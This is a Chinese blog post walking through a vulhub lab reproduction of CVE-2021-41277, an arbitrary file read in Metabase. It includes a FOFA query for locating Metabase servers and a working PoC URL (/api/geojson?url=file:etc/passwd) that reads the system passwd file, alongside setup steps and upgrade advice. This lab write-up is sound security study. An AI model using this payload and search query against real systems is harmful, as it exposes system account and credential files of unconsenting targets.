vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现

yao阿土

于 2023-08-02 16:20:16 发布

阅读量188

点赞数 1

分类专栏：信息安全文章标签：网络安全安全 web安全

原文链接：https://blog.csdn.net/Wiofgb/article/details/127134000?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169096438816800185825568%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=169096438816800185825568&biz_id=0&u

版权

信息安全专栏收录该内容

3 篇文章 0 订阅

订阅专栏

本文详细描述了如何在vulhub靶场复现Metabase的CVE-2021-41277信息泄露漏洞，包括环境搭建、账号注册、漏洞利用方法（通过抓包获取passwd文件内容）以及修复建议——及时升级到最新版本以防止进一步攻击。

摘要由CSDN通过智能技术生成

vulhub靶场漏洞复现
CVE-2021-41277 Metabase 信息泄露漏洞复现
fofa语法：

app="Metabase"

环境搭建：

cd vulhub/metabase/CVE-2021-41277
docker-compose up -d    》》打开dockers容器
docker ps -a   》》》查看开放的端口
ipconfig    >>>查看地址
yourip::3000/setup   》》》地址加端口查看服务

在这里插入图片描述

注册一个账号，邮箱什么随便输入，如图
在这里插入图片描述
跳过数据库填写

最后一步完成操作，然后进入这个页面，如图：
poc：http://your-ip:3000/api/geojson?url=file:etc/passwd etc/passwd 》》这个文件存放着所有用户账号的信息。可以使用 cat /etc/passwd 命令查看该文件内容. /etc/shadow 》》》用于存储 Linux 系统中用户的密码信息,又称为“影子文件”。

etc中有一个passwd 文件,存储了系统中所有用户的基本信息,但由于该文件允许所有用户读取,易导致用户密码泄露,因此 Linux 系统将用户的密码信息从 /etc/passwd 文件中分离出来,并单独放到了此文件中。
漏洞复现：
打开抓包软件，对输入poc的页面进行抓包，并发送数据包即可达成任意文件读取的目的。
在这里插入图片描述